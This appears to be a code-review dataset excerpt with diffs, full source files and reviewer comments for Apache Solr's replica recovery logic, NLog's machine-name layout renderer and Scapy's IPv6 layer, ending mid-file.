log.info("Found new versions added after startup: num=[{}]", oldIdx);
if (log.isInfoEnabled()) {
log.info("currentVersions size={} range=[{} to {}]", recentVersions.size(), recentVersions.get(0),
recentVersions.get(recentVersions.size() - 1));
}
}
if (startingVersions.isEmpty()) {
log.info("startupVersions is empty");
} else {
if (log.isInfoEnabled()) {
log.info("startupVersions size={} range=[{} to {}]", startingVersions.size(), startingVersions.get(0),
startingVersions.get(startingVersions.size() - 1));
}
}
} catch (Exception e) {
SolrException.log(log, "Error getting recent versions.", e);
recentVersions = new ArrayList<>(0);
}
}
if (recoveringAfterStartup) {
// if we're recovering after startup (i.e. we have been down), then we need to know what the last versions were
// when we went down. We may have received updates since then.
recentVersions = startingVersions;
try {
if (ulog.existOldBufferLog()) {
// this means we were previously doing a full index replication
// that probably didn't complete and buffering updates in the
// meantime.
log.info("Looks like a previous replication recovery did not complete - skipping peer sync.");
firstTime = false; // skip peersync
}
} catch (Exception e) {
SolrException.log(log, "Error trying to get ulog starting operation.", e);
firstTime = false; // skip peersync
}
}
if (replicaType == Replica.Type.TLOG) {
zkController.stopReplicationFromLeader(coreName);
}
final String ourUrl = ZkCoreNodeProps.getCoreUrl(baseUrl, coreName);
Future<RecoveryInfo> replayFuture = null;
while (!successfulRecovery && !Thread.currentThread().isInterrupted() && !isClosed()) { // don't use interruption or
// it will close channels
// though
try {
CloudDescriptor cloudDesc = this.coreDescriptor.getCloudDescriptor();
final Replica leader = pingLeader(ourUrl, this.coreDescriptor, true);
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
boolean isLeader = leader.getCoreUrl().equals(ourUrl);
if (isLeader && !cloudDesc.isLeader()) {
throw new SolrException(ErrorCode.SERVER_ERROR, "Cloud state still says we are leader.");
}
if (cloudDesc.isLeader()) {
// we are now the leader - no one else must have been suitable
log.warn("We have not yet recovered - but we are now the leader!");
log.info("Finished recovery process.");
zkController.publish(this.coreDescriptor, Replica.State.ACTIVE);
return;
}
log.info("Begin buffering updates. core=[{}]", coreName);
// recalling buffer updates will drop the old buffer tlog
ulog.bufferUpdates();
if (log.isInfoEnabled()) {
log.info("Publishing state of core [{}] as recovering, leader is [{}] and I am [{}]", core.getName(),
leader.getCoreUrl(),
ourUrl);
}
zkController.publish(this.coreDescriptor, Replica.State.RECOVERING);
final Slice slice = zkStateReader.getClusterState().getCollection(cloudDesc.getCollectionName())
.getSlice(cloudDesc.getShardId());
try {
prevSendPreRecoveryHttpUriRequest.abort();
} catch (NullPointerException e) {
// okay
}
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
sendPrepRecoveryCmd(leader.getBaseUrl(), leader.getCoreName(), slice);
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
// we wait a bit so that any updates on the leader
// that started before they saw recovering state
// are sure to have finished (see SOLR-7141 for
// discussion around current value)
// TODO since SOLR-11216, we probably won't need this
try {
Thread.sleep(waitForUpdatesWithStaleStatePauseMilliSeconds);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
}
// first thing we just try to sync
if (firstTime) {
firstTime = false; // only try sync the first time through the loop
if (log.isInfoEnabled()) {
log.info("Attempting to PeerSync from [{}] - recoveringAfterStartup=[{}]", leader.getCoreUrl(),
recoveringAfterStartup);
}
// System.out.println("Attempting to PeerSync from " + leaderUrl
// + " i am:" + zkController.getNodeName());
boolean syncSuccess;
try (PeerSyncWithLeader peerSyncWithLeader = new PeerSyncWithLeader(core,
leader.getCoreUrl(), ulog.getNumRecordsToKeep())) {
syncSuccess = peerSyncWithLeader.sync(recentVersions).isSuccess();
}
if (syncSuccess) {
SolrQueryRequest req = new LocalSolrQueryRequest(core,
new ModifiableSolrParams());
// force open a new searcher
core.getUpdateHandler().commit(new CommitUpdateCommand(req, false));
req.close();
log.info("PeerSync stage of recovery was successful.");
// solrcloud_debug
cloudDebugLog(core, "synced");
log.info("Replaying updates buffered during PeerSync.");
replayFuture = replay(core);
// sync success
successfulRecovery = true;
break;
}
log.info("PeerSync Recovery was not successful - trying replication.");
}
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
log.info("Starting Replication Recovery.");
try {
replicate(zkController.getNodeName(), core, leader);
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
replayFuture = replay(core);
if (isClosed()) {
log.info("RecoveryStrategy has been closed");
break;
}
log.info("Replication Recovery was successful.");
successfulRecovery = true;
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
log.warn("Recovery was interrupted", e);
close = true;
} catch (Exception e) {
SolrException.log(log, "Error while trying to recover", e);
}
} catch (Exception e) {
SolrException.log(log, "Error while trying to recover. core=" + coreName, e);
} finally {
if (successfulRecovery) {
log.info("Registering as Active after recovery.");
try {
if (replicaType == Replica.Type.TLOG) {
zkController.startReplicationFromLeader(coreName, true);
}
zkController.publish(this.coreDescriptor, Replica.State.ACTIVE);
} catch (Exception e) {
log.error("Could not publish as ACTIVE after successful recovery", e);
successfulRecovery = false;
}
if (successfulRecovery) {
close = true;
recoveryListener.recovered();
}
}
}
if (!successfulRecovery) {
if (waitBetweenRecoveries(core.getName())) break;
}
}
// if replay was skipped (possibly to due pulling a full index from the leader),
// then we still need to update version bucket seeds after recovery
if (successfulRecovery && replayFuture == null) {
log.info("Updating version bucket highest from index after successful recovery.");
core.seedVersionBuckets();
}
log.info("Finished recovery process, successful=[{}]", successfulRecovery);
}
/**
* Make sure we can connect to the shard leader as currently defined in ZK
* @param ourUrl if the leader url is the same as our url, we will skip trying to connect
*/
private final Replica pingLeader(String ourUrl, CoreDescriptor coreDesc, boolean mayPutReplicaAsDown)
throws Exception {
int numTried = 0;
while (true) {
CloudDescriptor cloudDesc = coreDesc.getCloudDescriptor();
DocCollection docCollection = zkStateReader.getClusterState().getCollection(cloudDesc.getCollectionName());
if (!isClosed() && mayPutReplicaAsDown && numTried == 1 &&
docCollection.getReplica(coreDesc.getCloudDescriptor().getCoreNodeName())
.getState() == Replica.State.ACTIVE) {
// this operation may take a long time, by putting replica into DOWN state, client won't query this replica
zkController.publish(coreDesc, Replica.State.DOWN);
}
numTried++;
Replica leaderReplica = null;
if (isClosed()) {
return leaderReplica;
}
try {
leaderReplica = zkStateReader.getLeaderRetry(
cloudDesc.getCollectionName(), cloudDesc.getShardId());
} catch (SolrException e) {
Thread.sleep(500);
continue;
}
if (leaderReplica.getCoreUrl().equals(ourUrl)) {
return leaderReplica;
}
try (HttpSolrClient httpSolrClient = buildRecoverySolrClient(leaderReplica.getCoreUrl())) {
SolrPingResponse resp = httpSolrClient.ping();
return leaderReplica;
} catch (IOException e) {
log.error("Failed to connect leader {} on recovery, try again", leaderReplica.getBaseUrl());
Thread.sleep(500);
} catch (Exception e) {
if (e.getCause() instanceof IOException) {
log.error("Failed to connect leader {} on recovery, try again", leaderReplica.getBaseUrl());
Thread.sleep(500);
} else {
return leaderReplica;
}
}
}
}
public static Runnable testing_beforeReplayBufferingUpdates;
final private Future<RecoveryInfo> replay(SolrCore core)
throws InterruptedException, ExecutionException {
if (testing_beforeReplayBufferingUpdates != null) {
testing_beforeReplayBufferingUpdates.run();
}
if (replicaType == Replica.Type.TLOG) {
// roll over all updates during buffering to new tlog, make RTG available
SolrQueryRequest req = new LocalSolrQueryRequest(core,
new ModifiableSolrParams());
core.getUpdateHandler().getUpdateLog().copyOverBufferingUpdates(new CommitUpdateCommand(req, false));
req.close();
return null;
}
Future<RecoveryInfo> future = core.getUpdateHandler().getUpdateLog().applyBufferedUpdates();
if (future == null) {
// no replay needed\
log.info("No replay needed.");
} else {
log.info("Replaying buffered documents.");
// wait for replay
RecoveryInfo report = future.get();
if (report.failed) {
SolrException.log(log, "Replay failed");
throw new SolrException(ErrorCode.SERVER_ERROR, "Replay failed");
}
}
// the index may ahead of the tlog's caches after recovery, by calling this tlog's caches will be purged
core.getUpdateHandler().getUpdateLog().openRealtimeSearcher();
// solrcloud_debug
cloudDebugLog(core, "replayed");
return future;
}
final private void cloudDebugLog(SolrCore core, String op) {
if (!log.isDebugEnabled()) {
return;
}
try {
RefCounted<SolrIndexSearcher> searchHolder = core.getNewestSearcher(false);
SolrIndexSearcher searcher = searchHolder.get();
try {
final int totalHits = searcher.count(new MatchAllDocsQuery());
final String nodeName = core.getCoreContainer().getZkController().getNodeName();
log.debug("[{}] {} [{} total hits]", nodeName, op, totalHits);
} finally {
searchHolder.decref();
}
} catch (Exception e) {
log.debug("Error in solrcloud_debug block", e);
}
}
final public boolean isClosed() {
return close || cc.isShutDown();
}
final private void sendPrepRecoveryCmd(String leaderBaseUrl, String leaderCoreName, Slice slice)
throws SolrServerException, IOException, InterruptedException, ExecutionException {
WaitForState prepCmd = new WaitForState();
prepCmd.setCoreName(leaderCoreName);
prepCmd.setNodeName(zkController.getNodeName());
prepCmd.setCoreNodeName(coreZkNodeName);
prepCmd.setState(Replica.State.RECOVERING);
prepCmd.setCheckLive(true);
prepCmd.setOnlyIfLeader(true);
final Slice.State state = slice.getState();
if (state != Slice.State.CONSTRUCTION && state != Slice.State.RECOVERY && state != Slice.State.RECOVERY_FAILED) {
prepCmd.setOnlyIfLeaderActive(true);
}
int conflictWaitMs = zkController.getLeaderConflictResolveWait();
// timeout after 5 seconds more than the max timeout (conflictWait + 3 seconds) on the server side
int readTimeout = conflictWaitMs + Integer.parseInt(System.getProperty("prepRecoveryReadTimeoutExtraWait", "8000"));
try (HttpSolrClient client = buildRecoverySolrClient(leaderBaseUrl)) {
client.setSoTimeout(readTimeout);
HttpUriRequestResponse mrr = client.httpUriRequest(prepCmd);
prevSendPreRecoveryHttpUriRequest = mrr.httpUriRequest;
log.info("Sending prep recovery command to [{}]; [{}]", leaderBaseUrl, prepCmd);
mrr.future.get();
}
}
}
| 1 | 38,959 | We don't need this anymore after #2151 | apache-lucene-solr | java |
@@ -48,7 +48,7 @@ namespace NLog.LayoutRenderers
[AppDomainFixedOutput]
[ThreadAgnostic]
[ThreadSafe]
- public class MachineNameLayoutRenderer : LayoutRenderer, IStringValueRenderer
+ public class MachineNameLayoutRenderer : LayoutRenderer
{
internal string MachineName { get; private set; }
| 1 | //
// Copyright (c) 2004-2018 Jaroslaw Kowalski <[email protected]>, Kim Christensen, Julian Verdurmen
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
//
// * Neither the name of Jaroslaw Kowalski nor the names of its
// contributors may be used to endorse or promote products derived from this
// software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
// THE POSSIBILITY OF SUCH DAMAGE.
//
#if !SILVERLIGHT
namespace NLog.LayoutRenderers
{
using System;
using System.Text;
using NLog.Common;
using NLog.Config;
using NLog.Internal;
/// <summary>
/// The machine name that the process is running on.
/// </summary>
[LayoutRenderer("machinename")]
[AppDomainFixedOutput]
[ThreadAgnostic]
[ThreadSafe]
public class MachineNameLayoutRenderer : LayoutRenderer, IStringValueRenderer
{
internal string MachineName { get; private set; }
/// <inheritdoc/>
protected override void InitializeLayoutRenderer()
{
base.InitializeLayoutRenderer();
try
{
MachineName = EnvironmentHelper.GetMachineName();
if (string.IsNullOrEmpty(MachineName))
{
InternalLogger.Info("MachineName is not available.");
}
}
catch (Exception exception)
{
InternalLogger.Error(exception, "Error getting machine name.");
if (exception.MustBeRethrown())
{
throw;
}
MachineName = string.Empty;
}
}
/// <inheritdoc/>
protected override void Append(StringBuilder builder, LogEventInfo logEvent)
{
builder.Append(MachineName);
}
/// <inheritdoc/>
string IStringValueRenderer.GetFormattedString(LogEventInfo logEvent) => MachineName;
}
}
#endif
| 1 | 17,960 | this is this removed? I don't understand in the context of this PR | NLog-NLog | .cs |
@@ -107,6 +107,9 @@ def getmacbyip6(ip6, chainCC=0):
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
+
+ if isinstance(ip6,Net6):
+ ip6 = iter(ip6).next()
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) | 1 | #! /usr/bin/env python
#############################################################################
## ##
## inet6.py --- IPv6 support for Scapy ##
## see http://natisbad.org/IPv6/ ##
## for more informations ##
## ##
## Copyright (C) 2005 Guillaume Valadon <[email protected]> ##
## Arnaud Ebalard <[email protected]> ##
## ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License version 2 as ##
## published by the Free Software Foundation. ##
## ##
## This program is distributed in the hope that it will be useful, but ##
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
## General Public License for more details. ##
## ##
#############################################################################
"""
IPv6 (Internet Protocol v6).
"""
from __future__ import absolute_import
from __future__ import print_function
import random
import socket
import sys
import scapy.modules.six as six
from scapy.modules.six.moves import range
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
if not hasattr(socket, "IPPROTO_IPIP"):
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = 4
from scapy.config import conf
from scapy.base_classes import *
from scapy.data import *
from scapy.compat import *
from scapy.fields import *
from scapy.packet import *
from scapy.volatile import *
from scapy.sendrecv import sr,sr1,srp1
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.supersocket import SuperSocket,L3RawSocket
from scapy.arch import *
from scapy.utils6 import *
from scapy.layers.l2 import *
from scapy.layers.inet import *
from scapy.utils import inet_pton, inet_ntop, strxor
from scapy.error import warning
if conf.route6 is None:
# unused import, only to initialize conf.route6
import scapy.route6
#############################################################################
# Helpers ##
#############################################################################
def get_cls(name, fallback_cls):
return globals().get(name, fallback_cls)
##########################
## Neighbor cache stuff ##
##########################
conf.netcache.new_cache("in6_neighbor", 120)
@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address addr
'src' address is used as source of the message. Message is sent on iface.
By default, timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
chainCC=chainCC)
return res
@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
"""Returns the MAC address corresponding to an IPv6 address
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff,a,nh = conf.route6.route(ip6)
if isinstance(iff, six.string_types):
if iff == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
else:
if iff.name == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
#############################################################################
#############################################################################
### IPv6 addresses manipulation routines ###
#############################################################################
#############################################################################
class Net6(Gen): # syntax ex. fec0::/126
"""Generate a list of IPv6s from a network address or a name"""
name = "ipv6"
ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
def __init__(self, net):
self.repr = net
tmp = net.split('/')+["128"]
if not self.ipaddress.match(net):
tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
netmask = int(tmp[1])
self.net = inet_pton(socket.AF_INET6, tmp[0])
self.mask = in6_cidr2mask(netmask)
self.plen = netmask
def __iter__(self):
def m8(i):
if i % 8 == 0:
return i
tuple = [x for x in range(8, 129) if m8(x)]
a = in6_and(self.net, self.mask)
tmp = [x for x in struct.unpack("16B", a)]
def parse_digit(a, netmask):
netmask = min(8,max(netmask,0))
a = (int(a) & (0xff<<netmask),(int(a) | (0xff>>(8-netmask)))+1)
return a
self.parsed = list(map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple)))
def rec(n, l):
if n and n % 2 == 0:
sep = ':'
else:
sep = ''
if n == 16:
return l
else:
ll = []
for i in range(*self.parsed[n]):
for y in l:
ll += [y+sep+'%.2x'%i]
return rec(n+1, ll)
return iter(rec(0, ['']))
def __repr__(self):
return "Net6(%r)" % self.repr
#############################################################################
#############################################################################
### IPv6 Class ###
#############################################################################
#############################################################################
class IP6Field(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "16s")
def h2i(self, pkt, x):
if isinstance(x, str):
try:
x = in6_ptop(x)
except socket.error:
x = Net6(x)
elif isinstance(x, list):
x = [Net6(a) for a in x]
return x
def i2m(self, pkt, x):
return inet_pton(socket.AF_INET6, plain_str(x))
def m2i(self, pkt, x):
return inet_ntop(socket.AF_INET6, x)
def any2i(self, pkt, x):
return self.h2i(pkt,x)
def i2repr(self, pkt, x):
if x is None:
return self.i2h(pkt,x)
elif not isinstance(x, Net6) and not isinstance(x, list):
if in6_isaddrTeredo(x): # print Teredo info
server, flag, maddr, mport = teredoAddrExtractInfo(x)
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
elif in6_isaddr6to4(x): # print encapsulated address
vaddr = in6_6to4ExtractAddr(x)
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
return self.i2h(pkt, x) # No specific information to return
def randval(self):
return RandIP6()
class SourceIP6Field(IP6Field):
__slots__ = ["dstname"]
def __init__(self, name, dstname):
IP6Field.__init__(self, name, None)
self.dstname = dstname
def i2m(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
if conf.route6 is None:
# unused import, only to initialize conf.route6
import scapy.route6
dst = ("::" if self.dstname is None else getattr(pkt, self.dstname))
if isinstance(dst, (Gen, list)):
r = {conf.route6.route(daddr) for daddr in dst}
if len(r) > 1:
warning("More than one possible route for %r" % (dst,))
x = min(r)[1]
else:
x = conf.route6.route(dst)[1]
return IP6Field.i2h(self, pkt, x)
class DestIP6Field(IP6Field, DestField):
bindings = {}
def __init__(self, name, default):
IP6Field.__init__(self, name, None)
DestField.__init__(self, name, default)
def i2m(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
x = self.dst_from_pkt(pkt)
return IP6Field.i2h(self, pkt, x)
ipv6nh = { 0:"Hop-by-Hop Option Header",
4:"IP",
6:"TCP",
17:"UDP",
41:"IPv6",
43:"Routing Header",
44:"Fragment Header",
47:"GRE",
50:"ESP Header",
51:"AH Header",
58:"ICMPv6",
59:"No Next Header",
60:"Destination Option Header",
112:"VRRP",
132:"SCTP",
135:"Mobility Header"}
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
#50: "IPv6ExtHrESP",
#51: "IPv6ExtHdrAH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt" }
class IP6ListField(StrField):
__slots__ = ["count_from", "length_from"]
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16*len(i)
def i2count(self, pkt, i):
if isinstance(i, list):
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = b""
remain = s
if l is not None:
remain,ret = s[:l],s[l:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain+ret,lst
def i2m(self, pkt, x):
s = b""
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self,pkt,x):
s = []
if x == None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self,p):
if self.nh == 58: # ICMPv6
t = ord(p[0])
if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic)
elif self.nh == 43 and ord(p[2]) == 4: # Segment Routing header
return IPv6ExtHdrSegmentRouting
return get_cls(ipv6nhcls.get(self.nh, "Raw"), "Raw")
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [ BitField("version" , 6 , 4),
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
DestIP6Field("dst", "::1") ]
def route(self):
dst = self.dst
if isinstance(dst,Gen):
dst = iter(dst).next()
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src,self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
l = len(p) - 40
p = p[:4]+struct.pack("!H", l)+p[6:]
return p
def extract_padding(self, s):
l = self.plen
return s[:l], s[l:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133,134,135,136,144,145]):
return struct.pack("B", self.nh)+self.payload.hashret()
if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
return self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):
# With segment routing header (rh == 4), the destination is
# the first address of the IPv6 addresses list
try:
sd = self.addresses[0]
except IndexError:
sd = self.dst
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, self.src)
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
else:
return struct.pack("B", nh)+self.payload.hashret()
def answers(self, other):
if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
if self.nh in [4, 41]:
return self.payload.answers(other)
if isinstance(other, IPv6) and other.nh in [4, 41]:
return self.answers(other.payload)
if isinstance(other, IP) and other.proto in [4, 41]:
return self.answers(other.payload)
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
class _IPv46(IP):
"""
This class implements a dispatcher that is used to detect the IP version
while parsing Raw IP pcap files.
"""
@classmethod
def dispatch_hook(cls, _pkt=None, *_, **kargs):
if _pkt:
if struct.unpack('B', _pkt[0])[0] >> 4 == 6:
return IPv6
elif kargs.get("version") == 6:
return IPv6
return IP
def inet6_register_l3(l2, l3):
return getmacbyip6(l3.dst)
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # <- Basic case
(ss == os and request_has_rh)): # <- Request has a RH :
# don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = raw(selfup)
s2 = raw(otherup)
l = min(len(s1), len(s2))
res = s1[:l] == s2[:l]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = raw(selfup)
s2 = raw(otherup)
l = min(len(s1), len(s2))
